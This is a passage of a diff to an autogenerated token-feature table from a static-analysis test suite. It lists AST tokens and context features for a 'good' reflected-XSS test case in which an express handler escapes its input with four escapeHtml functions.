autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf += '"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf += '"' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf += '"' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf += '"' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:9:124:23 | buf += '"' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:16:124:23 | '"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:16:124:23 | '"' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:16:124:23 | '"' | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:16:124:23 | '"' | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:16:124:23 | '"' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:124:16:124:23 | '"' | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:11 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:11 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:11 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:11 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:11 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:11 | buf | stringConcatenatedWith | -endpoint- ch | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf += ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf += ch | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf += ch | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf += ch | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:9:127:17 | buf += ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:16:127:17 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:16:127:17 | ch | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:16:127:17 | ch | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:16:127:17 | ch | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:16:127:17 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:127:16:127:17 | ch | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:131:10:131:12 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:131:10:131:12 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:131:10:131:12 | buf | enclosingFunctionBody | s buf i s length ch s chatAt i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:131:10:131:12 | buf | enclosingFunctionName | escapeHtml4 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:131:10:131:12 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:134:3 | app | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:134:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:134:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:134:7 | app.get | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:134:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:134:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:141:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:141:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:141:2 | app.get ... / OK\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:141:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:141:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:1:141:2 | exceptional return of app.get ... / OK\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:5:134:7 | get | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:5:134:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:5:134:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:9:134:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:9:134:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:9:134:19 | '/user/:id' | calleeImports | express | @@ -20960,6 +139861,41 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:9:134:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:9:134:19 | '/user/:id' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:9:134:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml1 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml2 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml2 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml3 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml3 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml3 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml4 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml4 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml4 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml4 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | escapeHtml4 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | this | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | this | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:134:21 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | exceptional return of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | exceptional return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | functio ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | functio ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | functio ... // OK\\n} | calleeImports | express | @@ -20967,6 +139903,101 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | functio ... // OK\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | functio ... // OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | return of anonymous function | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:22:141:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:32:134:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:134:37:134:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:11 | url | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:11 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:11 | url | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:11 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:11 | url | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url = req.params.id | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url = req.params.id | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:9:135:27 | url = req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:17 | req | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:17 | req | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:17 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:24 | req.params | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:24 | req.params | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:24 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:27 | req.params.id | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:27 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:27 | req.params.id | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:27 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:15:135:27 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:19:135:24 | params | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:19:135:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:19:135:24 | params | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:19:135:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:19:135:24 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:26:135:27 | id | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:26:135:27 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:26:135:27 | id | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:26:135:27 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:135:26:135:27 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:5 | res | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:5 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:10 | res.send | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:10 | res.send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:10 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | exceptional return of res.sen ... 1(url)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | exceptional return of res.sen ... 1(url)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | exceptional return of res.sen ... 1(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | exceptional return of res.sen ... 1(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | exceptional return of res.sen ... 1(url)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | res.sen ... 1(url)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | res.sen ... 1(url)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | res.sen ... 1(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | res.sen ... 1(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:3:137:28 | res.sen ... 1(url)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:7:137:10 | send | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:7:137:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:7:137:10 | send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:7:137:10 | send | enclosingFunctionName | app.get#functionalargument | +| 